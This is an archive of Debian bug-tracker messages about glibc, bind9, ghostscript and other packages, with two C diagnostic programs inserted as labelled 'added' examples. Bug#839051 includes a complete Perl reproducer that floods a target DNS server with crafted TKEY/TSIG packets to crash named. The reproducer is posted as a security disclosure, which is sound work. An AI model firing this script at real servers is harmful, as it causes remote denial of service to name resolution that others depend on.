Bug#998156: contains non-DFSG-free files

2021-11-01 Thread Florian Weimer
* Henry Cejtin:

> (I assume you meant ml-nlffigen.)  ml-nlffigen is part of SML/NJ, not
> part of MLton.

/usr/bin/mlnlffigen is part of mlton-tools.

I believe the code generation requirements are different for MLton and
SML/NJ.



Bug#998156: contains non-DFSG-free files

2021-11-01 Thread Florian Weimer
* Henry Cejtin:

> As far as I know, the ckit stuff is just included because it needed
> some tweaks to work under MLton.
> I don't think that any of "our" stuff depends on it.

I think mlnlffigen needs ckit.



Bug#993162: libc6: i386 (Geode LX): latest push to Bookwork produces multiple sig ILL

2021-08-29 Thread Florian Weimer
* Aurelien Jarno:

> I have been looking at the corresponding instruction, this is:
>
> 2ed0 <__cpu_indicator_init@GCC_4.8.0>:
> 2ed0:   f3 0f 1e fb endbr32
>
> This is an Intel CET instruction, and it seems your CPU doesn't support
> executing it. Anyway this shows that the problem is in libgcc-s1, I am
> therefore reassigning the bug.

Correct, CET uses long NOPs, which are not supported by some x86 CPUs
and trap on them.

Thanks,
Florian



Bug#975219: [Debichem-devel] Bug#975219: elkcode: FTBFS: internal compiler error: in lookup_field_for_decl, at tree-nested.c:288

2020-11-22 Thread Florian Weimer
* Lucas Nussbaum:

> Hi Michael,
>
> On 22/11/20 at 15:32 +0100, Michael Banck wrote:
>> Hi Lucas,
>> 
>> That looks like an ICE, shouldn't that be filed with gfortran?
>
> Usually my logic is: if there's only one similar failure, I file a bug
> against the affected package, rather than against the toolchain package
> or the library, because it might be something very strange with the
> package that is causing the toolchain to misbehave.

ICEs are still considered GCC bugs (by upstream, maybe not by Debian),
as long as they are reproducible and not the result of faulty
hardware.



Bug#964815: it looks like dprof2calltree cannot be distributed with a GPL-2 work

2020-07-11 Thread Florian Weimer
* Nicholas D. Steeves:

> Hi,
>
> Adrian Bunk  writes:
>
>> On Fri, Jul 10, 2020 at 07:48:31PM -0400, Nicholas D Steeves wrote:
>>
>>> it would still not be DFSG-free, because it
>>> fails the "desert island test" for snail mail.  Were OmniTI Computer
>>> Consulting to accept email, it would also fail the "dissident test".
>>
>> This is the first time I see someone claiming BSD-4-clause would not
>> be distributable.
>>
>
> Well, BSD-4-clause isn't on the list of DFSG-approved licenses...
>
>   https://wiki.debian.org/DFSGLicenses

The DFSG announcement in

  

predates the removal of the advertising clause by almost two years.
As a result, there isn't any ambiguity at all whether the original
4-clause BSD license is DFSG-compliant or not: At the time, the BSD
license still had the advertising clause, and yet it is explicitly
considered as free.

And the Internet Archive agrees:



(The webwml history does not contain this version of the file,
probably because it wasn't in CVS at first.)



Bug#954715: glibc: FTBFS: tests failed: signal/tst-minsigstksz-1 signal/tst-minsigstksz-2

2020-03-22 Thread Florian Weimer
* Lucas Nussbaum:

> Source: glibc
> Version: 2.30-2
> Severity: serious
> Justification: FTBFS on amd64
> Tags: bullseye sid ftbfs
> Usertags: ftbfs-20200322 ftbfs-bullseye
>
> Hi,
>
> During a rebuild of all packages in sid, your package failed to build
> on amd64.

>> FAIL: signal/tst-minsigstksz-1
>> FAIL: signal/tst-minsigstksz-2

--
--
FAIL: signal/tst-minsigstksz-1
original exit status 1
Didn't expect signal from child: got `Segmentation fault'
--
--
FAIL: signal/tst-minsigstksz-2
original exit status 1
Incorrect signal from child: got `Segmentation fault', need `Aborted'


The build host has this CPU:

model name  : Intel(R) Xeon(R) Platinum 8175M CPU @ 2.50GHz

This CPU supports AVX-512, and the minimum signal stack size is not
large enough for the amount of data the kernel saves on the stack.
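As an added example (not from the bug report and not glibc's own test): a program that sizes its alternate signal stack from AT_MINSIGSTKSZ, which Linux 5.14 and later report in the auxiliary vector on x86 (older kernels report 0), instead of trusting the static MINSIGSTKSZ that AVX-512 state outgrows, and then checks that a handler really runs on that stack. It assumes Linux with glibc; the 4 KiB margin and the 64 KiB fallback are my own choices.

```c
/* Added example: size the alternate signal stack from what the kernel
 * says a signal frame needs (AT_MINSIGSTKSZ), never below MINSIGSTKSZ,
 * then prove a handler runs on it.  Linux/glibc assumed. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE 1
#endif
#include <signal.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/auxv.h>

#ifndef AT_MINSIGSTKSZ
#define AT_MINSIGSTKSZ 51          /* value from <elf.h>; old-header fallback */
#endif
#define FALLBACK_SIGSTKSZ (64 * 1024)   /* my choice when the kernel says 0 */
#define HANDLER_MARGIN    (4 * 1024)    /* my choice: room for handler frames */

static volatile sig_atomic_t handler_on_altstack = -1;

static void on_sigusr1(int sig)
{
    (void)sig;
    stack_t ss;
    /* sigaltstack() is async-signal-safe; SS_ONSTACK is set while the
     * handler is executing on the alternate stack. */
    if (sigaltstack(NULL, &ss) == 0)
        handler_on_altstack = (ss.ss_flags & SS_ONSTACK) ? 1 : 0;
    else
        handler_on_altstack = 0;
}

/* Bytes the kernel needs for one signal frame on this CPU; 0 if unknown. */
size_t kernel_min_sigstksz(void)
{
    return (size_t)getauxval(AT_MINSIGSTKSZ);
}

/* Alternate stack size to use: kernel frame size plus a margin, falling
 * back to a generous constant, and never below MINSIGSTKSZ/SIGSTKSZ. */
size_t safe_sigstksz(void)
{
    size_t k = kernel_min_sigstksz();
    size_t n = k ? k + HANDLER_MARGIN : FALLBACK_SIGSTKSZ;
    if (n < (size_t)MINSIGSTKSZ)
        n = (size_t)MINSIGSTKSZ;
    if (n < (size_t)SIGSTKSZ)
        n = (size_t)SIGSTKSZ;
    return n;
}

/* Install an alternate stack of safe_sigstksz() bytes, deliver SIGUSR1,
 * and report whether the handler ran on it: 1 yes, 0 no, -1 setup error. */
int run_handler_on_sized_altstack(void)
{
    size_t size = safe_sigstksz();
    void *mem = malloc(size);
    if (!mem)
        return -1;

    stack_t ss;
    memset(&ss, 0, sizeof ss);
    ss.ss_sp = mem;
    ss.ss_size = size;
    if (sigaltstack(&ss, NULL) != 0) { free(mem); return -1; }

    struct sigaction sa;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_sigusr1;
    sa.sa_flags = SA_ONSTACK;      /* without this the alt stack is unused */
    sigemptyset(&sa.sa_mask);
    if (sigaction(SIGUSR1, &sa, NULL) != 0) { free(mem); return -1; }

    handler_on_altstack = -1;
    raise(SIGUSR1);

    /* Restore the default disposition and disable the alt stack before
     * freeing its memory. */
    signal(SIGUSR1, SIG_DFL);
    ss.ss_flags = SS_DISABLE;
    sigaltstack(&ss, NULL);
    free(mem);
    return handler_on_altstack;
}

int main(void)
{
    return run_handler_on_sized_altstack() == 1 ? 0 : 1;
}
```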

  



Bug#924712: crypt() not available _XOPEN_SOURCE is defined

2019-08-25 Thread Florian Weimer
* Francesco Poli:

> Hello everyone,
> I am sorry to ask, but... I cannot understand what the status of
> [this bug report] is.
>
> [this bug report]: 
>
> A serious bug for libc6-dev without any apparent activity since last
> March?  Sure there must have been some hidden progress that I cannot
> see.

We provided a solution acceptable to the reporter.  I do not think
further action is needed on the glibc side.  The manual page needs to
be updated to reflect the change, but that's not part of glibc.



Bug#924891: glibc: FTBFS: /<>/build-tree/amd64-libc/conform/UNIX98/ndbm.h/scratch/ndbm.h-test.c:1:10: fatal error: ndbm.h: No such file or directory

2019-03-27 Thread Florian Weimer
retitle 924891 glibc: misc/tst-pkey fails due to cleared PKRU register after signal in amd64 32-bit compat mode
thanks

* Lucas Nussbaum:

> On 27/03/19 at 08:48 +0100, Florian Weimer wrote:
>> > If that's useful, I can easily provide access to an AWS VM to debug this
>> > issue.
>> 
>> Oh, that would be quite helpful indeed.
>
> Can you send your SSH key? (I thought there was a way to get the SSH key
> for a DD, but I cannot find it anymore)
>
> Then you will be able to ssh to root@18.184.55.40.
> There's sbuild and schroot setup on the VM.
>
> When you are done, please 'poweroff' the machine, which will terminate
> it.

The issue reproduces outside the chroot, with the stretch userland.

What happens is that once we get out of the SIGUSR1 signal handler,
the PKRU register has value zero.  This happens around this code in
the test:

  /* Check that in a signal handler, there is no access.  */
  xsignal (SIGUSR1, _handler);
  xraise (SIGUSR1);
  xsignal (SIGUSR1, SIG_DFL);
  TEST_COMPARE (sigusr1_handler_ran, 1);

I checked the following (via a breakpoint in pkey_get; I don't think
GDB can read the PKRU register directly): Inside the SIGUSR1 signal
handler, PKRU has value 0x5554, as expected for this kernel, but
after the return, we get zero.  This is the first time a signal is
delivered on the main thread, so it's consistent with fairly broken
signal handling as far as the PKRU register is concerned.  I guess
clearing PKRU in this way might even constitute a minor security bug
(because the zero value means no restrictions).

This commit looks highly relevant:

commit a4455082dc6f0b5d51a23523f77600e8ede47c79
Author: Dave Hansen 
Date:   Wed Jun 8 10:25:33 2016 -0700

x86/signals: Add missing signal_compat code for x86 features

The 32-bit siginfo is a different binary format than the 64-bit
one.  So, when running 32-bit binaries on 64-bit kernels, we have
to convert the kernel's 64-bit version to a 32-bit version that
userspace can grok.

If the siginfo_t layout is incorrect (with regards to what the
hardware writes), I expect that we might end up copying back the wrong
PKRU value.

I'm not sure what to do here.  This really looks like a kernel bug.
Maybe we should just verify that this is fixed in the buster kernel
and move on?

Lucas, can you run your rebuild tests on newer kernels?
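The check described above, done from inside the program instead of with a breakpoint in pkey_get, as an added example that is not part of the bug report or of glibc's tst-pkey: restrict a freshly allocated key, take SIGUSR1, and compare the key's rights before and after the handler returns. It assumes x86 Linux with the glibc 2.27+ pkey wrappers; where protection keys are unavailable it reports that rather than a result.

```c
/* Added example: does the PKRU-backed restriction on a key survive a
 * signal delivery?  A result of 0 is the failure mode described above:
 * the key reads back as unrestricted (PKRU cleared) after the handler. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE 1
#endif
#include <errno.h>
#include <signal.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Prototypes spelled out so this builds even if the feature macros are
 * not in effect; these are ordinary glibc 2.27+ exports. */
extern int pkey_alloc(unsigned int flags, unsigned int access_rights);
extern int pkey_set(int key, unsigned int access_rights);
extern int pkey_get(int key);
extern int pkey_free(int key);
#ifndef PKEY_DISABLE_ACCESS
#define PKEY_DISABLE_ACCESS 0x1
#endif

static int g_key = -1;
static volatile int rights_in_handler = -2;

static void on_sigusr1(int sig)
{
    (void)sig;
    /* Inside the handler the kernel has loaded its own PKRU value, so
     * this is informational only (it is not what we compare against). */
    rights_in_handler = pkey_get(g_key);
}

/* Returns 1 if the rights set before the signal are unchanged after the
 * handler returns, 0 if they were lost, and -1 if protection keys are
 * unavailable here (no hardware/kernel support, or a syscall filter),
 * in which case nothing was tested. */
int pkru_preserved_across_signal(void)
{
    g_key = pkey_alloc(0, 0);
    if (g_key < 0)
        return -1;               /* ENOSYS, EINVAL, ENOSPC: unsupported */

    /* Restrict the key; PKRU now differs from its all-access value. */
    if (pkey_set(g_key, PKEY_DISABLE_ACCESS) != 0) {
        pkey_free(g_key);
        return -1;
    }
    int before = pkey_get(g_key);

    struct sigaction sa, old;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_sigusr1;
    sigemptyset(&sa.sa_mask);
    if (sigaction(SIGUSR1, &sa, &old) != 0) {
        pkey_set(g_key, 0);
        pkey_free(g_key);
        return -1;
    }
    raise(SIGUSR1);
    sigaction(SIGUSR1, &old, NULL);

    int after = pkey_get(g_key);
    pkey_set(g_key, 0);          /* lift the restriction before freeing */
    pkey_free(g_key);

    /* A zero 'after' means every key is fully accessible again, i.e. the
     * restriction silently went away across the signal. */
    return (before == after && after == PKEY_DISABLE_ACCESS) ? 1 : 0;
}

int main(void)
{
    int r = pkru_preserved_across_signal();
    return r == 0 ? 1 : 0;       /* only a cleared PKRU counts as failure */
}
```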



Bug#924891: glibc: FTBFS: /<>/build-tree/amd64-libc/conform/UNIX98/ndbm.h/scratch/ndbm.h-test.c:1:10: fatal error: ndbm.h: No such file or directory

2019-03-27 Thread Florian Weimer
* Lucas Nussbaum:

> On 26/03/19 at 23:10 +0100, Aurelien Jarno wrote:
>> On 2019-03-22 17:30, Florian Weimer wrote:
>> > > About the archive rebuild: The rebuild was done on EC2 VM instances from
>> > > Amazon Web Services, using a clean, minimal and up-to-date chroot. Every
>> > > failed build was retried once to eliminate random failures.
>> > 
>> > I believe the actual test failure is tst-pkey.
>> > 
>> > Presumably, this rebuild was performed on some Xeon SP CPU.  Do you
>> > know which model?  Do you have any information about the kernel and
>> > hypervisor used?
>> > 
>> > 32-bit protection key support has had issues from time to time.
>> 
>> Do you have some more details about the issue? Is it a glibc or a kernel
>> problem?
>> 
>> If we can't fix the issue easily on the libc side, I guess the way to
>> fix that is to XFAIL that test on 32-bit x86. 
>
> If that's useful, I can easily provide access to an AWS VM to debug this
> issue.

Oh, that would be quite helpful indeed.



Bug#924891: glibc: FTBFS: /<>/build-tree/amd64-libc/conform/UNIX98/ndbm.h/scratch/ndbm.h-test.c:1:10: fatal error: ndbm.h: No such file or directory

2019-03-22 Thread Florian Weimer
> About the archive rebuild: The rebuild was done on EC2 VM instances from
> Amazon Web Services, using a clean, minimal and up-to-date chroot. Every
> failed build was retried once to eliminate random failures.

I believe the actual test failure is tst-pkey.

Presumably, this rebuild was performed on some Xeon SP CPU.  Do you
know which model?  Do you have any information about the kernel and
hypervisor used?

32-bit protection key support has had issues from time to time.

Thanks.



Bug#924712: crypt() not available _XOPEN_SOURCE is defined

2019-03-21 Thread Florian Weimer
* Laurent Bigonville:

> Le 19/03/19 à 19:43, Florian Weimer a écrit :
>> * Laurent Bigonville:
>>
>>> Package: libc6-dev
>>> Version: 2.28-8
>>> Severity: serious
>>>
>>> Hi,
>>>
>>> The crypt.3 manpage states that _XOPEN_SOURCE should be defined for
>>> crypt() to be available.
>>>
>>> But it looks like it's currently the opposite: if _XOPEN_SOURCE is
>>> defined, the function cannot be found.

>> Can you compile the software using _DEFAULT_SOURCE (well, the default)
>> or _GNU_SOURCE instead?
>
> Yes, the software can be compiled when _XOPEN_SOURCE is not defined or
> when _GNU_SOURCE is defined instead.

Sorry, what I was trying to ask is whether this would be an acceptable
change for you.



Bug#924712: crypt() not available _XOPEN_SOURCE is defined

2019-03-19 Thread Florian Weimer
* Laurent Bigonville:

> Package: libc6-dev
> Version: 2.28-8
> Severity: serious
>
> Hi,
>
> The crypt.3 manpage states that _XOPEN_SOURCE should be defined for
> crypt() to be available.
>
> But it looks like it's currently the opposite: if _XOPEN_SOURCE is
> defined, the function cannot be found.

Can you compile the software using _DEFAULT_SOURCE (well, the default)
or _GNU_SOURCE instead?

We do not want to provide the CRYPT extension anymore because it
implies not just support for the crypt function, but also for the DES
encryption functions, which we definitely do not want.  In _XOPEN_SOURCE
mode, it's either all of these functions or none of them (and we chose
the latter because of DES), otherwise glibc wouldn't conform to the
interface specification.

We definitely should update the manual page, though.



Bug#904808: libcap-ng0: libcap-ng's use of pthread_atfork causes segfaults

2019-02-28 Thread Florian Weimer
The problem here is the weak declaration:

$ eu-readelf --symbols=.dynsym /lib64/libcap-ng.so.0.0.0 | grep pthread_atfork
   28:   0 NOTYPE  WEAK   DEFAULT  UNDEF pthread_atfork

In the Fedora 29 build, the constructor looks like this:

Dump of assembler code for function init_lib:
   0x25d0 <+0>:  endbr64
   0x25d4 <+4>:  cmpq   $0x0,0x4a0c(%rip)        # 0x6fe8
   0x25dc <+12>: je     0x25ee
   0x25de <+14>: lea    0xcb(%rip),%rdx          # 0x26b0
   0x25e5 <+21>: xor    %esi,%esi
   0x25e7 <+23>: xor    %edi,%edi
   0x25e9 <+25>: jmpq   0x24f0
   0x25ee <+30>: retq

src/cap-ng.c has this:

/*
 * The pthread_atfork function is being made weak so that we can use it
 * if the program is linked with pthreads and not requiring it for
 * everything that uses libcap-ng.
 */
extern int __attribute__((weak)) pthread_atfork(void (*prepare)(void),
                                                void (*parent)(void),
                                                void (*child)(void));
…
static void init_lib(void) __attribute__ ((constructor));
static void init_lib(void)
{
	if (pthread_atfork)
		pthread_atfork(NULL, NULL, deinit);
}

This is wrong.  pthread_atfork needs to be a *strong* reference, otherwise
the implementation in libc_nonshared.a is not used.  This implementation
provides the correct __dso_handle argument, allowing unregistration at
dlclose.

For glibc 2.28 and later, the fix should be simple: Just delete the weak
declaration.  For older glibc versions, you need to call
__register_atfork directly, with an explicit __dso_handle argument.  (I
believe systemd has an example of this which looks correct.)  This is a
stable glibc ABI, despite all those glibc internals.

We cannot fix this in libpthread because of the tail call in init_lib.
It destroys the caller's stack frame, so the identity of the calling DSO
is not available to pthread_atfork.  (Without the tail call, we could
use __builtin_return_address (0) and the internal variant of dladdr to
figure out the caller.)

Thanks,
Florian
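The corrected constructor pattern in runnable form, as an added example (this is not libcap-ng's code): the weak extern is gone and the prototype comes from <pthread.h>, so on glibc 2.28 and later the link resolves pthread_atfork to the copy in libc_nonshared.a, which hands this object's __dso_handle to __register_atfork. The fork-and-check function is mine, added so the handler registration can be verified without a debugger.

```c
/* Added example: strong reference to pthread_atfork in a constructor,
 * plus a self-check that the child handler runs after fork().
 * Assumes glibc 2.28+ (no -lpthread needed for pthread_atfork there). */
#include <pthread.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Set by the registered child handler (the counterpart of libcap-ng's
 * deinit()).  The parent's copy must stay 0; only the child's flips. */
static volatile int child_handler_ran = 0;

static void deinit(void)
{
    child_handler_ran = 1;
}

/* Correct form: no weak extern and no "if (pthread_atfork)" guard; the
 * library simply requires pthread_atfork to exist.  Because this is not
 * a tail call, the caller's identity (__dso_handle) is passed along. */
static void init_lib(void) __attribute__((constructor));
static void init_lib(void)
{
    if (pthread_atfork(NULL, NULL, deinit) != 0)
        abort();                /* only ENOMEM is possible here */
}

/* Fork and report whether the child handler ran in the child:
 * 1 yes, 0 no, -1 if fork()/waitpid() failed. */
int child_handler_runs_after_fork(void)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0)
        _exit(child_handler_ran ? 0 : 1);   /* child reports via exit status */
    int status;
    if (waitpid(pid, &status, 0) != pid || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status) == 0 ? 1 : 0;
}

/* 1 if the parent's flag was left alone, i.e. only the child handler ran. */
int parent_flag_unchanged(void)
{
    return child_handler_ran == 0;
}

int main(void)
{
    return child_handler_runs_after_fork() == 1 ? 0 : 1;
}
```

With the weak declaration removed, `eu-readelf --symbols=.dynsym` on the rebuilt library is expected to show an undefined __register_atfork instead of a WEAK UNDEF pthread_atfork, which is the quick way to confirm the fix took.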



Bug#907585: Backport also needs fixing

2018-09-12 Thread Florian Weimer
found 907585 20180518-1~bpo9+1
thanks

firmware-cavium_20180518-1~bpo9+1_all.deb is still in the package pool
and contains the offending binary.



Bug#857909: [libc6-dev] getpid() in child process created using clone(CLONE_VM) returns parent's pid

2017-03-23 Thread Florian Weimer
* John Paul Adrian Glaubitz:

> I would suggest filing a bug report to glibc upstream or posting on
> their mailing list to ask for feedback.

Upstream has since removed the PID cache:

  
  




Bug#846374: debsecan: Debsecan cannot access https://security-tracker.debian.org/tracker/debsecan/*/1

2016-11-30 Thread Florian Weimer
* Berke Durak:

> Debsecan stopped working.  It fails as it is trying to access
>
>https://security-tracker.debian.org/tracker/debsecan/release/1/GENERIC
>
> or /sid, /jessie, etc.
>
> It displays the following error:
>
>   % debsecan 
>   error: while downloading 
> https://security-tracker.debian.org/tracker/debsecan/release/1/GENERIC:
>   error: [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed 
> (_ssl.c:590)
>
> The error message is a bit misleading

It is not: if the certificate verification fails, debsecan will never
get to the point where it will download anything and could notice that
the requested data is not available.

> - accessing the URL via
> another agent shows that while the SSL certificate is valid, the
> server responds with
>
>   Object not found
>   The requested debsecan object has not been found.

This could have been caused by pasting the wrong URL (e.g., with a
trailing colon).

> This could be a server issue or a change in debsecan.

Or something could intercept HTTPS traffic on your end, and the
interception certificate was not loaded into the system trust store.



Bug#839317: [pkg-golang-devel] Bug#839317: golang-1.7: FTBFS: tests failed

2016-10-01 Thread Florian Weimer
* Lucas Nussbaum:

>> --- FAIL: TestLoadFixed (0.00s)
>>  time_test.go:943: Now().In(loc).Zone() = "-01", -3600, want
>> "GMT+1", -3600

Is this due to a tzdata change?





Bug#832824: haskell-src-exts: reporting a bug at GHC for linker error. build fail on mips64el

2016-10-01 Thread Florian Weimer
* Clint Adams:

> Can you explain what GHC might be doing wrong?  Did binutils get
> stricter about something?  What is R_MIPS_GOT_DISP?  Are the GOT
> constraints the same on mips64el as they are on mipsel?

I suppose so, because the instruction encoding is quite similar.

According to the binutils sources, R_MIPS_GOT_DISP has a 16-bit limit
on 64-bit MIPS.

The GCC documentation mentions this:

| '-mxgot'
| '-mno-xgot'
|  Lift (do not lift) the usual restrictions on the size of the global
|  offset table.
| 
|  GCC normally uses a single instruction to load values from the GOT.
|  While this is relatively efficient, it only works if the GOT is
|  smaller than about 64k.  Anything larger causes the linker to
|  report an error such as:
| 
|   relocation truncated to fit: R_MIPS_GOT16 foobar
| 
|  If this happens, you should recompile your code with '-mxgot'.
|  This works with very large GOTs, although the code is also less
|  efficient, since it takes three instructions to fetch the value of
|  a global symbol.

So passing -mxgot would be worth a try.  This seems to be similar to
the -fpic/-fPIC distinction.



Bug#839260: ghostscript: various sandbox bypasses

2016-09-30 Thread Florian Weimer
Package: ghostscript
Version: 9.19~dfsg-3
Tags: security
Severity: grave

Tavis Ormandy has reported several sandbox bypasses on the
oss-security mailing list.

  
(also see follow-ups)

Filed upstream as:

  
  

This is a fairly important security issue because it introduces
vulnerabilities into CUPS and programs such as mail clients which use
mailcap entries and run Ghostscript indirectly.



Bug#839051: bind9: Unfixed crasher bug in wheezy LTS

2016-09-28 Thread Florian Weimer
Package: bind9
Version: 1:9.8.4.dfsg.P1-6+nmu2+deb7u10
Tags: security wheezy
Severity: grave

The wheezy LTS version of bind9 has an additional crasher bug.  It may
be due to an incomplete backport of the fix for CVE-2015-5477.  I'm
attaching the reproducer.

Upstream BIND without the fix for CVE-2016-2776 is *not* affected by
this issue, so it is something else.

use strict;
use warnings;

use Net::DNS;
use IO::Socket::INET;
use Socket;

$ARGV[0] or die "usage: $0 TARGET\n";

sub build_header {
return "\x12\x34"		# message ID
	. "\1\0"		# query
	. "\0\1"		# 1 question record
	. "\0\0\0\0"		# no answer, no authority
	. "\0\3";		# additional record count
}

sub long_name ($$) {
my ($pad, $length) = @_;
my $result = "";
while (length($result) < $length) {
	my $tofill = $length - length($result);
	if ($tofill > 63) {
	$tofill = 60;
	}
	$result .= chr($tofill) . ($pad x $tofill);
}
return $result . "\0";
}

for my $length (240 .. 255) {
for my $excess (20 .. 50) {
	my $packet = build_header() . long_name('a', $length);
	$packet .= "\0\1\0\1";		# IN A

	# Additional section.
	$packet .= "\0\0)" # OPT
	. pack("n", 512 + $excess)
	. "\0\0\200\0\0\0";

	$packet .= "\0\0\371\0\377\0\0\0\0";   # TKEY RR
	{
	my $tkey_rdata = "\xc0\x0c"	# Compression reference
		. "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";
	$packet .= pack("n", length($tkey_rdata)) . $tkey_rdata;
	}
	if (0) {
	$packet .= "\0\0\371\0\377\0\0\0\0";   # TKEY RR
	{
		my $tkey_rdata = "\xc0\x0c"	# Compression reference
		. "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";
		$packet .= pack("n", length($tkey_rdata)) . $tkey_rdata;
	}
	}

	$packet .= "\xc0\x0c\0\372\0\377\0\0\0\0";   # TSIG RR
	{
	my $rdata = "\xc0\x0c"	# Compression reference
		. ("\0" x 14);
	my $pad = "\xcc" x 0;
	$rdata .= pack("n", length($pad)) . $pad;
	$packet .= pack("n", length($rdata)) . $rdata;
	}

	if (0) {
	my $copy = $packet;
	my $pkt = Net::DNS::Packet->new(\$copy);
	$pkt->print;
	}

	print "length: $length, excess: $excess, packet: "
	. length($packet) . "\n";
	my $socket = IO::Socket::INET->new (PeerAddr => $ARGV[0],
	PeerPort => 53,
	Proto => 'udp');
	$socket->send($packet);
	$socket->setsockopt(SOL_SOCKET, SO_RCVTIMEO,
			pack('l!l!', 0, 200 * 1000))
	or die "setsockopt: $!";
	my $buf;
	eval {
	local $SIG{ALRM} = sub { die "alarm\n" };
	alarm 1;
	$socket->recv($buf, 1000);
	alarm 0;
	};
	$socket->close;
	print "answer: " . length($buf). "\n";
	# my $answer = Net::DNS::Packet->new(\$buf);
	# $answer->print;
}
}


Bug#839010: bind9: CVE-2016-2776: Assertion failure in query processing

2016-09-27 Thread Florian Weimer
Package: bind9
Version: 1:9.10.3.dfsg.P4-10.1
Tags: security
Severity: grave

ISC has released a security alert at

  

Relevant information from this report follows:

CVE:   CVE-2016-2776
Document Version:  2.0
Posting date:  2016-09-27
Program Impacted:  BIND
Versions affected: 9.0.x -> 9.8.x, 9.9.0->9.9.9-P2, 9.9.3-S1->9.9.9-S3,
   9.10.0->9.10.4-P2, 9.11.0a1->9.11.0rc1
Severity:  High
Exploitable:   Remotely

Description:

   Testing by ISC has uncovered a critical error condition which
   can occur when a nameserver is constructing a response.  A defect
   in the rendering of messages into packets can cause named to
   exit with an assertion failure in buffer.c while constructing a
   response to a query that meets certain criteria.

   This assertion can be triggered even if the apparent source
   address isn't allowed to make queries (i.e. doesn't match
   'allow-query').

Impact:

   All servers are vulnerable if they can receive request packets from
   any source.



Bug#838960: denial of service with crafted id3v2 tags in all mpg123 versions since 0.60

2016-09-27 Thread Florian Weimer
* Thomas Orgis:

> Am Tue, 27 Sep 2016 10:27:04 +0100
> schrieb James Cowgill : 
>
>> Does this have a CVE ID? If not it should get one.
>
> I wondered about that. At the moment I just acted on the bug report and
> pushed the fix. I have no personal experience with the CVE procedure.
> In the past, just "someone" made them appear.
>
> I tried to apply for a CVE using the horrific Google docs form
> (http://iwantacve.org/) now. How can they resort to such a third-party
> ECMAScript-fest instead of a simple HTML form for _security_ issue
> reporting?!

This is the first time I have heard about that site.  The official
form is at:

  

(It still uses Javascript.)

But I'm not sure if this is in scope here because the web form
requires you to confirm that the issue is not in a “CNA-covered
product”.  Debian is a CNA-covered product, mpg123 is part of Debian,
so it is unclear what to do here.  I'll ask around.



Bug#819050: Please leave the severity at serious, this bug is a security issue.

2016-03-24 Thread Florian Weimer
* Hilko Bengen:

> the original report may not have been 100% clear on this, but the bug is
> the main cause of a vulnerability in Suricata (a network IDS/IPS) that
> allows for remote denial of service, possibly remote code execution by
> simply passing crafted packets by a Suricata installation.

Without the complete test case, that's hard to tell.

If we cannot reproduce this, perhaps Suricata (at least in stable)
should not explicitly enable the PCRE JIT compiler?

I'm not sure if we can keep rebasing PCRE just to fix JIT compiler
issues.



Bug#807341: git-repair: uses non-random tempdir /tmp/tmprepo.0/.git/

2015-12-09 Thread Florian Weimer
* Jonas Smedegaard:

> git-repair uses /tmp/tmprepo.0/.git/ which is clearly static, and I
> believe therefore (on non-hardened systems) insecure.

I think it does mkdir and if it fails, it tries again with
/tmp/tmprepo.1, /tmp/tmprepo.2, and so on.  I'm not sure you can abuse
this and fool git-repair into using a pre-existing directory with mode
777.  At least not with non-historic NFS.

Florian



Bug#803161: mailman: /var/log/mailman/* world-readable by default, leaking sensitive list information

2015-10-27 Thread Florian Weimer
severity 803161 normal
thanks

* Dominik George:

> Severity: critical
> Tags: security
> Justification: root security hole
>
> The log files of mailman, residing in /var/lib/mailman/log and in
> /var/log/mailman, and the log directory itself are created
> world-readable by default. This discloses sensitive information about
> list users, for example e-mail addresses and full names in the subscribe
> log, to all unprivileged system users that have shell or filesystem
> access.

This issue can be considered a security vulnerability, but it is
certainly not a root security hole, hence lowering the severity.

Florian



Bug#801413: polarssl: CVE-2015-5291: Remote attack on clients using session tickets or SNI

2015-10-20 Thread Florian Weimer
* James Cowgill:

> They seemed pretty resistive to the idea of just adding specific
> patches on top of 1.3.9, and if you look at the changelog there are a
> number of other security bugs which seem important but don't have CVEs
> because they couldn't be triggered remotely.
> https://github.com/ARMmbed/mbedtls/blob/mbedtls-1.3.14/ChangeLog

I can sympathize with that.  For example, I strongly recommend the
RSA-CRT hardening introduced in 1.3.13.

> One thing which was suggested was to use 1.3.14 and then disable at
> compile time all the new features which may affect the ABI and then
> revert the SONAME change, but is doing that actually allowed for the
> security archive or will the update be too big?

We can do that, but I don't know if it is a good idea to patch
cryptographic software in such extensive ways.

We can live with the addition of new symbols, but removal of symbols,
changes in struct sizes or offsets, and so on, would be hugely
problematic.  For a start, you could just build both the old and new
versions and run libabigail on them, to get an idea what actually did
change.

Florian



Bug#781128: security.debian.org: GeoDNS load balancing of Debian Security mirrors + out of date mirrors means you cant patch

2015-03-25 Thread Florian Weimer
* Sam McLeod:

> 4) Mirror given by GeoDNS for security.debian.org was:
> - nashira.anu.edu.au (Located in Canberra, Australia)
> - Out of date and did not contain the patch.

As far as I can tell, the Australian mirror is in sync now:

$ wget -q -O- --header Host: security.debian.org 
http://gluck.debian.org/debian-security/dists/wheezy/updates/  | grep InRelease
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="InRelease">InRelease</a></td><td align="right">24-Mar-2015 21:32  </td><td align="right">101K</td></tr>

Either this was temporary, or the issue had a different cause.

Note that mirror update is not instantaneous around the globe.  In
some cases, the debian-security-announce message will arrive some time
before packages are available.  In other cases, the message arrives
afterwards.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#781128: security.debian.org: GeoDNS load balancing of Debian Security mirrors + out of date mirrors means you cant patch

2015-03-25 Thread Florian Weimer
* Sam McLeod:

> So the fix is just to wait for all Debian mirrors to be in sync
> before you can patch?

We usually send out the announcement email only after the mirror sync
has completed.  But there can be delays, and other users might get
confused if there is a security update without a matching
announcement.

Can you confirm that the update is now available to you?





